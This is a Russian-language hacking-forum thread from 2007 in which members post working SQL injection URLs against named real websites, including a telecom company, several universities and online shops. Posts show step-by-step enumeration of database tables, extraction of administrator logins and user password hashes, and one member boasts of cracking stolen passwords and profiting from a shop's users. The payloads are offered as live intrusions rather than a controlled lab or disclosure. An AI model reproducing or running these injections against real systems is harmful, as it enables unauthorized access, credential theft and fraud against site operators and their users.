HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.09.2007, 12:46
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

http://www.menopausethemusical.com
Цитата:
http://www.menopausethemusical.com/main.php?page=reviews&get_id=-1+UNION+SELECT+1,2,CAST(USER()+AS+BINARY),4,CAST(D ATABASE()+AS+BINARY),CAST(VERSION()+AS+BINARY),7,8/*
 
Ответить с цитированием

  #2  
Старый 03.09.2007, 15:50
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

http://www.matrixtelecom.ru. Компания Матрикс Телеком.

Практически любой параметр в передаваемых скриптам уязвим к SQL-Injection. Сложность состоит в том, что отключён вывод ошибок в страницу и фильтруется кавычка. Ну это скорее не сложность, а маленькая неприятность. Админка находится на урле http://www.matrixtelecom.ru/admin, которая требует авторизации доступа. Это не беда - тут есть SQL Injection. Приступим:

-- Определяем версию
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,DATABA SE()/*

-- Перебираем колонки (интересующая нас с индексом 16 и именем mx_conf)
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,10,11+FR OM+INFORMATION_SCHEMA.TABLES+LIMIT+X,1/*

-- Перебираем поля в этой таблице
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10,11+F ROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x 6d785f636f6e66+LIMIT+X,1/*

-- Получаем структуру таблицы настроек сайта: mx_con(cnf_name, сnf_def, cnf_value)
-- Перебираем настройки сайта из таблицы mx_con
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+X,1/*

-- Нас интересует логин
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+0,1/*

-- И пароль
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+1,1/*

Всё... Доступ в админку открыт...

З.Ы. Администрация сайта уведомлена о данном баге. Не стоит дефейсить или менять контент.
 
Ответить с цитированием

  #3  
Старый 03.09.2007, 18:22
Rast1k
Banned
Регистрация: 09.08.2007
Сообщений: 56
Провел на форуме:
372630

Репутация: -63
Отправить сообщение для Rast1k с помощью ICQ
По умолчанию

Код:
http://edu.direktor.ru/lib/author.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version()  ,database()),4,5,6/*
Код:
http://stumpage.uvm.edu/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12 +from+information_schema.columns/*/
Код:
http://5ballov.ru/vacansy.php?city=Москва&salary_min=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,  11,12,13,14,15,16,17,18,19,20/*&schedule=свободный&sort=salary_min
Код:
http://www.gameland.ru/articles2/catalog/game.asp?code=1'
Great:
Цитата:
Инъекции вида:

http://site.ru/index.php?a='

будут удаляться.
либо ковыряй до конца, либо не пости. даю три дня, потом удаляю

Последний раз редактировалось _Great_; 04.09.2007 в 15:21..
 
Ответить с цитированием

  #4  
Старый 03.09.2007, 22:59
halkfild
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

Google: PR - 7
http://primes.utm.edu
University of Tennessee at Martin Martin, TN 38238

Код:
http://primes.utm.edu/bios/page.php?id=&username=lol'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
4.1.20-log:primes_@localhost:primes
 
Ответить с цитированием

  #5  
Старый 03.09.2007, 23:32
halkfild
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

Google: PR - 5
theboard.byu.edu


http://theboard.byu.edu/index.php?area=viewall&id=-777+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24/*

5.0.24-Debian_1-log:100hourboard@localhost:100hourboard

http://theboard.byu.edu/index.php?area=viewall&id=-777+union+select+TABLE_NAME,TABLE_SCHEMA,concat_ws (0x3a,version(),user(),database()),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+inf ormation_schema.tables+limit+150,1/*

смотрим таблици


[100hourboard]

100Hrbb_banlist
100Hrbb_categories
100Hrbb_config
100Hrbb_confirm
100Hrbb_disallow
100Hrbb_easymod
100Hrbb_forum_prune
100Hrbb_forums
100Hrbb_groups
100Hrbb_posts
100Hrbb_posts_text
100Hrbb_privmsgs
100Hrbb_privmsgs_text
100Hrbb_ranks
100Hrbb_search_results
100Hrbb_search_wordlist
100Hrbb_search_wordmatch
100Hrbb_sessions
100Hrbb_smilies
100Hrbb_themes
100Hrbb_themes_name
100Hrbb_topics
100Hrbb_topics_watch
100Hrbb_user_group
100Hrbb_vote_desc
и тд

вот нужные таблици но у меня нет начал лагать кто хочет подберите столбци и получите пассы и мыла
100Hrbb_users
phprojekt_users
 
Ответить с цитированием

  #6  
Старый 04.09.2007, 00:02
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

evruka.ru - Интернет-магазин
4.1.21-log:evrubase:giftshop@82.179.244.68
Подобрал название столбцов:
Код:
http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(username,char(58),passwd)+from+user+limit+141,141+--+
Получил: 89637:40f939d31d2e2a25
Но при запросе:
Код:
http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(passwd)+from+user+limit+141,141+--+
Получил совершенно другой хэш: 3e70346730b14ce7
У меня 2 вопроса почему так получается и каким алгоритмом шифруется пароль
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #7  
Старый 04.09.2007, 00:35
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от l-l00K  
evruka.ru - Интернет-магазин
4.1.21-log:evrubase:giftshop@82.179.244.68
Подобрал название столбцов:
Код:
http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(username,char(58),passwd)+from+user+limit+141,141+--+
Получил: 89637:40f939d31d2e2a25
Но при запросе:
Код:
http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(passwd)+from+user+limit+141,141+--+
Получил совершенно другой хэш: 3e70346730b14ce7
У меня 2 вопроса почему так получается и каким алгоритмом шифруется пароль
1.Мож есть нулевое значение passwd (null)
2.MySQL (16 значный хеш) (не перепутай с Mysql5)
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #8  
Старый 04.09.2007, 12:27
ant0ha
Участник форума
Регистрация: 22.05.2007
Сообщений: 144
Провел на форуме:
306311

Репутация: 119
По умолчанию

Интернет магазин 1 d o l l a r . r u, даже выплаты на автомате

Цитата:
http://1dollar.ru/?g=9999+union+select+1,2,login,4,email,6,7,8,psw+f rom+users+limit+558+,+1/*
mysql: 4.1.22-standard-log

Вытащил пароли всех юзеров, пароли в md5, половину только расшифровал, и немного поживился
 
Ответить с цитированием

  #9  
Старый 04.09.2007, 23:04
iv.
Познавший АНТИЧАТ
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052

Репутация: 1204


По умолчанию

хм
berkeley.edu
скрипт: journalism.berkeley.edu/students/resume.php
параметр: ID
кол-во колонок: 23
версия: 4.1.22
юзер: jschool@localhost
база: facebook
 
Ответить с цитированием

  #10  
Старый 04.09.2007, 23:38
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию


Код:
http://www.multi-service.ru/main.php?inc=tb_viev&pref=1&sw=1&id_vlosh=16+order+by+9/*
дальше не пошло. может мускул 3 версии , где то в топике была ссылка на статью по инъекции в 3 версию... лень искать...
а может хитрый какой нить запрос ... не знаю... крутите дальше кто хочет )
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ